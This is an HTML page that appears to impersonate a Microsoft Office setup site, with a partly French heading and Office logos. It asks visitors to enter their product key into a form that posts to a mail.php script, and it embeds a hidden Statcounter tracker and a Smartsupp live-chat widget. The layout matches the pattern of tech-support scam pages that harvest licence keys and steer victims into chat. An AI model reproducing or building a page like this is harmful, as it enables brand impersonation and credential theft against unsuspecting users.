<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>Office</title>
<!-- for-mobile-apps -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="keywords" content=" ">
<!-- //for-mobile-apps -->
<link href="css/css-bootstrap.css" rel="stylesheet" type="text/css" media="all">
<link href="css/css-style.css" rel="stylesheet" type="text/css" media="all">
<!-- js -->
<script type="text/javascript" src="js/js-jquery-2.1.4.min.js"></script>
<!-- //js -->
 
<!-- font-awesome icons -->
<link rel="stylesheet" href="css/css-font-awesome.min.css">
<!-- //font-awesome icons -->
<link href="http://fonts.googleapis.com/css?family=Comfortaa" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic,800,800italic" rel="stylesheet" type="text/css">

<body>

	<div class="header" style="background-color:#000;">
	 
			<nav class="navbar navbar-default">
				<div class="navbar-header navbar-left">
					<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
						<span class="sr-only">Toggle navigation</span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
					</button>
					<h1><a class="navbar-brand" href="https://fr.office.setup-online.com/index.html"><img src="images/images-officelogo.png"></a></h1>
					
					 
				</div>
				<!-- Collect the nav links, forms, and other content for toggling -->
				<div class="collapse navbar-collapse navbar-right" id="bs-example-navbar-collapse-1">
					<nav class="cl-effect-13" id="cl-effect-13">
					<a class="callushead" href="index-office.html#"></a>
						<ul class="nav navbar-nav">
							<li class="active"><a href="index-office.html#" class="mena"><h4></h4></a></li>
							<li style="background-color:#777;">
								  <a class="mena" href="https://fr.office.setup-online.com/index.html" style="text-decoration:none">Sign in</a>
								 
								 
							</li>
							    
							 
							   
						</ul>
						
					</nav>
				</div>
			</nav>
		 
	</div>
<!-- banner -->
	<div class="w3-banner">
		<div class="container">
		
		 
		<div class="w3l-banner-info">
		
		 
	
		<div class="col-sm-3">&nbsp;</div>
		<div class="col-sm-6" style="background-color:#fff; width: 60%;">
		  <h2> Salut. Obtenez votre office</h2>
		  <span>&nbsp;</span>

		 
		  <p><span class="number">1</span> Enter your product key Or
		<a href="myaccount-office.html"> I don't have the product key </a>
		     </p>
		  
		    <div style="border-left: dotted #b3b3b3 2px;margin-left: 12px;padding-bottom: 25px;">
		  <div class="combine" style="height: 215px; width: 436px; background-color: #dc3c00; border-radius: 8px;margin-left: 23px;
									    margin-top: 12px;">
										<div>&nbsp;</div>
	<div class="col-xs-12">
	<img src="images/images-ofclogo.png"></div>

	<form action="mail.php"  method="post" name="queryform" autocomplete="off">
					<h5 class="text-center product-heading"></h5>
					<p class="text-center" style="font-size: 12px;"></p>
                    <p class="text-center" style="font-size: 12px;margin-top:12px;text-shadow: 0.5px 0px 0px #000;"><b></b></p><p class="text-center" style="font-size: 12px;margin-top:12px;color: #1b07bd;"></p>

                    <br> <br> <br> <br> <br> <br> <br> <br> <br> <br> <br>
				
					
					<div class="form-group">
						<input type="text" id="keyField" name="productkey" class="form-control input-cls" placeholder="Product Key" required>
					</div> 
					<div class="col-lg-6">
						<input type="submit" name="submit" class="btn btn-primary form-control submit-btn" value="Submit"><br><br><br>
					</div>  
				</form>  </div></div>
		  <p><span class="number">2</span> Get your Office</p>
		
		
		<div class="col-sm-3">&nbsp;</div> </div> 


</div>
</div>
</div>



</body>

</html>
<!-- Default Statcounter code for office https://office-setup-fr.online/ -->
<script type="text/javascript">
var sc_project=13030475; 
var sc_invisible=1; 
var sc_security="e9d649a2"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js" async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img class="statcounter"
src="https://c.statcounter.com/13030475/0/e9d649a2/1/" alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<!-- End of Statcounter Code -->
<!-- Smartsupp Live Chat script -->
<script type="text/javascript">
var _smartsupp = _smartsupp || {};
_smartsupp.key = 'aa22cdc9519f79d41f9901fc7e239837c8d7376a';
window.smartsupp||(function(d) {
  var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
  s=d.getElementsByTagName('script')[0];c=d.createElement('script');
  c.type='text/javascript';c.charset='utf-8';c.async=true;
  c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
})(document);
</script>
<noscript> Powered by <a href=“https://www.smartsupp.com” target=“_blank”>Smartsupp</a></noscript>
